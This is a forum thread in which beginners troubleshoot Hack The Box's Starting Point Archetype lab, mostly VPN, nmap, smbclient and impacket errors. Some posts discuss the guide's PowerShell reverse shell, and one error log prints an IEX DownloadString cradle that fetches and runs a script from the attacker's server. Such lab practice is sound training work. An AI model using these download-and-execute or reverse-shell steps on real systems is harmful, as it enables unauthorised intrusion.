Starting Point [HTB]

245

Comments

  • Type your comment> @Fearless1 said:

    For me, I am connected just fine. I did the initial command "ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)" but when I try to follow along after, I am receiving:
    [email protected]:~$ nmap -sC -sV -p$ports 10.10.10.27
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-06 19:48 EDT
    Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
    QUITTING!

    and when I switch to nmap -sC -sV -p- 10.10.10.27 I get:
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-06 19:48 EDT
    Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
    Nmap done: 1 IP address (0 hosts up) scanned in 3.70 seconds

    When I include -Pn, it doesn't resolve. Any ideas? Since it is in the starting point, I'm not sure where to go to turn on a machine, if that's even a thing. I am very new to all of this. I signed up a long time ago, and just started trying my hand at this.

    I've been experiencing the same thing. Ever since Starting Point was posted up, I haven't been able to ping or nmap scan any machine. HTB VPN has been connected and tun0 has been showing my IP. Initialization Sequence is completed and still no prevail. I've tried changing up my nmap commands every now and then but that doesn't work either. I hope someone can help find a solution to this issue. Are HTB servers being overloaded? Or is it just that everyone has been on Starting Point lately, so that the machine is being overwhelmed by the amount of connections to it at the same time?

  • Nvm. I waited around an hour or so, but i was able to scan Starting Point. I guess it is just overloaded.

  • edited April 2020

    I can run the nmap just fine, but when I move on to the smbclient, im getting the error:
    "do_connect: Connection to 10.10.10.27 failed (Error NT_STATUS_HOST_UNREACHABLE)"
    Assuming its just down? Not really sure what to make of that

    Edit - Resolved this, I just re-downloaded my connection pack.

  • I am up to the point where we are beginning to get the reverse shell: "$client = new-object..."

    Im confused as to where im supposed to input these commands? I've installed powershell to my kali VM, but when I save that line as "shell.ps1," it just interprets that file as a text file. If anyone could give me some guidance that would be much appreciated.

  • edited April 2020

    Just follow the guide. You will use the file (shell.ps1) later as a parameter while invoking the reverse shell.

    Eauxfolles

  • I'm stuck around the same area.

    I have made a file called shell.ps1 with the code verbatim of the example inside.

    I start up my web server, get netcat listening and get the ufw callbacks but i get an error when I try to run:

    I think because the example is using IP 10.10.14.3 and i didnt change to be my IP but honestly im just copy/pasta'ing at this point so dunno...

    help?

  • probably you need to adjust the ip, which is an example and does not work necessarily.

    Eauxfolles

  • I'm always getting the same error message below as well

    nmap -sC -sV -p$ports 10.10.10.27
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-06 19:48 EDT
    Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
    QUITTING!

    I have tried with EU and US
    I have tried changing to tcp 443
    I have tried restarting VM

    What network configuration do you have for your kali box?
    bridge? NAT? host-only?

    Thanks

  • jesus holly molly seriously i am going crazy with this box.
    used openvpn to connect.connection is up and running.tried both EU and USA.restarted VM restarted router etc etc.
    SNo matter what i tried,i am still getting error when trying to execute command :
    smbclient -N -L \\10.10.10.27\
    error below:
    do_connect: Connection to 10.10.10.27 failed (Error NT_STATUS_IO_TIMEOUT)

    Captured some packets on my tun0 interface.seems like my VM is sending packets with Syn flag but not SYN ACK coming back from the remote server.

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
    16:03:07.401797 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059908513 ecr 0,nop,wscale 7], length 0
    16:03:07.407649 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059908519 ecr 0,nop,wscale 7], length 0
    16:03:08.411672 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059909523 ecr 0,nop,wscale 7], length 0
    16:03:08.411682 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059909523 ecr 0,nop,wscale 7], length 0
    16:03:10.434137 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059911545 ecr 0,nop,wscale 7], length 0
    16:03:10.434147 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059911545 ecr 0,nop,wscale 7], length 0
    16:03:15.907590 IP6 fe80::9b10:7b8d:24fb:7767 > ip6-allrouters: ICMP6, router solicitation, length 8
    16:04:23.482962 IP6 fe80::9b10:7b8d:24fb:7767 > ip6-allrouters: ICMP6, router solicitation, length 8

    Does anhybody know wtf is going on? Is the box unstable or am i missing something?Anybody facing the same issue?
    Thanks

  • Type your comment> @sabukabu said:

    I'm stuck around the same area.

    I have made a file called shell.ps1 with the code verbatim of the example inside.

    I start up my web server, get netcat listening and get the ufw callbacks but i get an error when I try to run:

    I think because the example is using IP 10.10.14.3 and i didnt change to be my IP but honestly im just copy/pasting at this point so dunno...

    help?

    Hey, I'm stuck here too. Have you figured what the problem was?

    This is my output.

    Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"

    At line:1 char:1

    • IEX (New-Object Net.WebClient).DownloadString("http://10.0.2.15/shell ...

    • ~~~~~~~~~~~~~~~~~

      • CategoryInfo : NotSpecified: (:) [], MethodInvocationException

      • FullyQualifiedErrorId : WebException

  • Have you guys tried killing all OpenVPN before starting your VPN .

    I have an issue where I had two VPN open. Perhaps one did not close correctly and it caused a lot of issues. Now before I reconnect I ensure the previous one has been killed.
    Sudo kill all openvpn

  • i got passed enumeration. I had to install something in order for it to work, though I thought that it was already installed. Now I'm stuck in the foothold trying to figure out where am I suppose to save the syntax.

  • @nofear said:
    Type your comment> @skillless said:

    Are the instructions to Starting Point accurate or do we have to figure something out? Im stuck on the enumeration part, at the end trying to open the dtsConfig file. The password that is shown is not working. Am I supposed to be lookin for another way in? Because I can't find one, yet.

    the password is right. i pass this tutorial today. try to change \ with / for mssql command. otherway command is executed with incorrect user (Guest i think)

    11:39PM Report Spoiler

    i got passed enumeration. I had to install something in order for it to work, though I thought that it was already installed. Now I'm stuck in the foothold trying to figure out where am I suppose to save the syntax.

  • Type your comment> @McL0vin said:

    jesus holly molly seriously i am going crazy with this box.
    used openvpn to connect.connection is up and running.tried both EU and USA.restarted VM restarted router etc etc.
    SNo matter what i tried,i am still getting error when trying to execute command :
    smbclient -N -L \\10.10.10.27\
    error below:
    do_connect: Connection to 10.10.10.27 failed (Error NT_STATUS_IO_TIMEOUT)

    Captured some packets on my tun0 interface.seems like my VM is sending packets with Syn flag but not SYN ACK coming back from the remote server.

    tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
    listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
    16:03:07.401797 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059908513 ecr 0,nop,wscale 7], length 0
    16:03:07.407649 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059908519 ecr 0,nop,wscale 7], length 0
    16:03:08.411672 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059909523 ecr 0,nop,wscale 7], length 0
    16:03:08.411682 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059909523 ecr 0,nop,wscale 7], length 0
    16:03:10.434137 IP 10.10.14.170.36742 > 10.10.10.27.microsoft-ds: Flags [S], seq 1137421174, win 64240, options [mss 1460,sackOK,TS val 3059911545 ecr 0,nop,wscale 7], length 0
    16:03:10.434147 IP 10.10.14.170.43430 > 10.10.10.27.netbios-ssn: Flags [S], seq 1399377996, win 64240, options [mss 1460,sackOK,TS val 3059911545 ecr 0,nop,wscale 7], length 0
    16:03:15.907590 IP6 fe80::9b10:7b8d:24fb:7767 > ip6-allrouters: ICMP6, router solicitation, length 8
    16:04:23.482962 IP6 fe80::9b10:7b8d:24fb:7767 > ip6-allrouters: ICMP6, router solicitation, length 8

    Does anhybody know wtf is going on? Is the box unstable or am i missing something?Anybody facing the same issue?
    Thanks

    same happens to me!
    Please help!

  • looks like your missing some backslashes

    you have two there, i think there should be four
    \\

    so
    smbclient -N -L \\10.10.10.27\
    not
    smbclient -N -L \10.10.10.27\

  • anybody faced the below issue while running Impacket's "mssqlclient.py" script?
    "Missing required parameter 'digestmod'

    [email protected]:~impacket/examples$ python3 mssqlclient.py ARCHETYPE/[email protected] -windows-auth
    Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

    Password:
    [*] Encryption required, switching to TLS
    [-] Missing required parameter 'digestmod'.

  • edited April 2020

    I am having issues running the python3 impacket commands. I downloaded the git as per the intruction and i go to the containing folder and it tell me that the command cannot be found .

    bash: mssqlclient: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlclient ARCHETYPE/[email protected] -windows-auth
    bash: mssqlclient: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlserver ARCHETYPE/[email protected] -windows-auth
    bash: mssqlserver: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlserver.py ARCHETYPE/[email protected] -windows-auth
    bash: mssqlserver.py: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples#

    i dont know what is the issue iam running a kali linux intallation with kde desktop

  • its been hours and i am stuck at this error plz help i tried both the slashes forward and backword with ARCHETYPE butstill the same result i removed python tried python3 in the command but same result with some more errors

    [email protected]:~/impacket/examples# python mssqlclient.py ARCHETYPE\[email protected] -windows-auth
    Impacket v0.9.22.dev1+20200416.91838.62162e0a - Copyright 2020 SecureAuth Corporation

    Password:
    Traceback (most recent call last):
    File "mssqlclient.py", line 173, in
    ms_sql.connect()
    File "/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0a-py2.7.egg/impacket/tds.py", line 532, in connect
    sock.connect(sa)
    File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
    socket.error: [Errno 113] No route to host

  • Type your comment> @zatoichi79 said:

    I am having issues running the python3 impacket commands. I downloaded the git as per the intruction and i go to the containing folder and it tell me that the command cannot be found .

    bash: mssqlclient: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlclient ARCHETYPE/[email protected] -windows-auth
    bash: mssqlclient: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlserver ARCHETYPE/[email protected] -windows-auth
    bash: mssqlserver: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples# mssqlserver.py ARCHETYPE/[email protected] -windows-auth
    bash: mssqlserver.py: command not found
    [email protected]:/home/zatoichi/Downloads/impacket/examples#

    i dont know what is the issue iam running a kali linux intallation with kde desktop

    Try sudo python3 mssqlclient.py ARCHETYPE/[email protected] -windows-auth

  • @deathstalker01 said:
    its been hours and i am stuck at this error plz help i tried both the slashes forward and backword with ARCHETYPE butstill the same result i removed python tried python3 in the command but same result with some more errors

    [email protected]:~/impacket/examples# python mssqlclient.py ARCHETYPE\[email protected] -windows-auth
    Impacket v0.9.22.dev1+20200416.91838.62162e0a - Copyright 2020 SecureAuth Corporation

    Password:
    Traceback (most recent call last):
    File "mssqlclient.py", line 173, in
    ms_sql.connect()
    File "/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0a-py2.7.egg/impacket/tds.py", line 532, in connect
    sock.connect(sa)
    File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
    socket.error: [Errno 113] No route to host

    "No route to host"
    There could be a problem with your VPN connection or a temporary issue on the remote server( firewall issue maybe or router issue?)
    Try resetting your Openvpn connection,try also EU server openvpn connection ( if you are using the USA) or USA opevpn ( if you are using the EU one)
    Also you could try as first step in tshooting to just ping the remote host to see kif there is basic connectivity

  • edited April 2020

    removed

  • hi, i am new in hack the box .

    After running nmap, i get the following error.

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 13:09 EDT
    Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
    QUITTING!

    please give me any solution.

  • edited April 2020

    Type your comment> @McL0vin said:

    @deathstalker01 said:
    its been hours and i am stuck at this error plz help i tried both the slashes forward and backword with ARCHETYPE butstill the same result i removed python tried python3 in the command but same result with some more errors

    [email protected]:~/impacket/examples# python mssqlclient.py ARCHETYPE\[email protected] -windows-auth
    Impacket v0.9.22.dev1+20200416.91838.62162e0a - Copyright 2020 SecureAuth Corporation

    Password:
    Traceback (most recent call last):
    File "mssqlclient.py", line 173, in
    ms_sql.connect()
    File "/usr/local/lib/python2.7/dist-packages/impacket-0.9.22.dev1+20200416.91838.62162e0a-py2.7.egg/impacket/tds.py", line 532, in connect
    sock.connect(sa)
    File "/usr/lib/python2.7/socket.py", line 228, in meth
    return getattr(self._sock,name)(*args)
    socket.error: [Errno 113] No route to host

    "No route to host"
    There could be a problem with your VPN connection or a temporary issue on the remote server( firewall issue maybe or router issue?)
    Try resetting your Openvpn connection,try also EU server openvpn connection ( if you are using the USA) or USA opevpn ( if you are using the EU one)
    Also you could try as first step in tshooting to just ping the remote host to see kif there is basic connectivity

    i tried connecting to different vpn my ifconfig command shows the tun0 interface hackthebox access shows I'm connected and in the cli it show initialization complete .......i think i am connected properly the issue is something else maybe with impacket i really dont know and o still cant find any solution
    i tried ping on the target 10.10.10.27 - it says host unreachable
    but when i try ping on some other htb active machine it works

  • Type your comment> @Swas231 said:

    hi, i am new in hack the box .

    After running nmap, i get the following error.

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-31 13:09 EDT
    Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-"
    QUITTING!

    please give me any solution.

    Hey man, I would suggest writing your own Nmap command. Write a command that basically scans services on all ports. Dm if you need a nudge

  • Rooted! After dabbling with 1/2 boxes for months, Starting Point has been amazing for beginners like myself. Too good!

  • edited April 2020

    Type your comment> @Sharvantg said:

    Type your comment> @sabukabu said:

    I'm stuck around the same area.

    I have made a file called shell.ps1 with the code verbatim of the example inside.

    I start up my web server, get netcat listening and get the ufw callbacks but i get an error when I try to run:

    I think because the example is using IP 10.10.14.3 and i didnt change to be my IP but honestly im just copy/pasting at this point so dunno...

    help?

    Hey, I'm stuck here too. Have you figured what the problem was?

    This is my output.

    Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"

    At line:1 char:1

    • IEX (New-Object Net.WebClient).DownloadString("http://10.0.2.15/shell ...

    • ~~~~~~~~~~~~~~~~~

      • CategoryInfo : NotSpecified: (:) [], MethodInvocationException

      • FullyQualifiedErrorId : WebException

    I was stuck here also. I determined that you need to:
    1. Determine what the ipaddr (inet addr) is for tun0.
    2. Use that ip to replace 10.10.14.3 in both shell.ps1 and the example xpcmdshell script.

  • Type your comment

  • Those who can't ping 10.10.10.27 or/and get Error #487: Your port specifications are illegal. Example of proper form: "-100,200-1024,T:3000-4000,U:60000-" you should first make sure that your vpn connection pack is from the starting point section https://www.hackthebox.eu/home/start. If connection pack is taken from Access section it WILL NOT work. Once you get the VPN for starting point up and running you should be able to ping and get a ports list

    Hack The Box

  • Can anyone help what vm network configuration i should run on, the nmap on ip works just fine on host ubuntu but doesnt in vm kali. Hence i dont get any values to fill in variable PORTS

  • @squirrelcop I use NAT. Try it or a network bridge.
    Does you VM have internet access? Can you ping 10.10.10.27?
    If you can't ping it probably you are on the wrong VPN or VPN doesn't work. If VPN works it should print "Initialization Sequence Completed" in the end of logs

    Hack The Box

Sign In to comment.